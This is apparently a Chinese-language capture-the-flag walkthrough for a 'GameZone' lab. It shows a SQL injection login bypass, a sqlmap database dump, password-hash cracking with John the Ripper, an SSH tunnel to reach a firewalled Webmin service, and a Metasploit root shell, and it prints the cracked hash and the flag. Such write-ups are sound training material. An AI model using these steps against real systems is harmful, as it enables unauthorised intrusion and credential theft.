这个房间将涵盖 SQLi(手动利用此漏洞和通过 SQLMap),破解用户的哈希密码,使用 SSH 隧道揭示隐藏服务,以及使用 metasploit payload 获取 root 权限。
1.通过SQL注入获得访问权限
手工注入
输入用户名 尝试使用SQL注入语句
' or 1=1 -- -密码留空
成功进入
使用SQLMAP工具
https://github.com/sqlmapproject/sqlmap
我们将使用 SQLMap 来导出 GameZone 的整个数据库
使用我们之前登录的页面,我们将指向 SQLMap 目标的游戏评论 搜索功能
首先,我们需要使用BP拦截对搜索功能的请求
将此请求保存到文本文件中。然后我们可以将其传递给 SQLMap,以使用我们的 已认证的用户会话。
sqlmap -r request.txt --dbms=mysql --dump-r 所使用的拦截请求
--dbms 数据库类型
--dump 尝试输入整个数据库
获得用户agent47的密码哈希值ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
可以使用john the ripper或者彩虹表在线查询破解密码
john /home/kali/Desktop/hash.txt -wordlist=/home/kali/Desktop/payloads/rockyou.txt --format=Raw-SHA256
既然有了账号密码 那么便可以ssh连接
2.通过反向ssh隧道暴露服务
通过反向 SSH 端口将远程服务器主机上的端口
转发到本地的主机和端口
使用一个名为 ss 的工具来调查主机上运行的Socket(套接字)
ss -tunpl-t TCP协议
-u UDP协议
-n 不解析服务名称
-p 显示使用该套接字的进程
-l 只查看监听的端口
我们可以看到,通过防火墙规则阻止了在端口 10000 上运行的服务(我们可以从 IPtable 列表中看到)。然而,使用 SSH 隧道,我们可以将端口暴露给我们(本地)!
从我们的本地机器,运行 ssh -L 10000:localhost:10000 <用户名>@
完成后,在你的浏览器中输入 "localhost:10000",你就可以访问新暴露的网页服务器。
登录
发现CMS是webmin 1.580
查找相关exploit
使用metasploit
设置好options
得到shell
会创建一个sessions
我们使用sessions -u <SESSION_ID>命令将我们的命令Shell会话升级为meterpreter会话
cat root.txt
得到
flag:
a4b945830144bdd71908d12d902adeee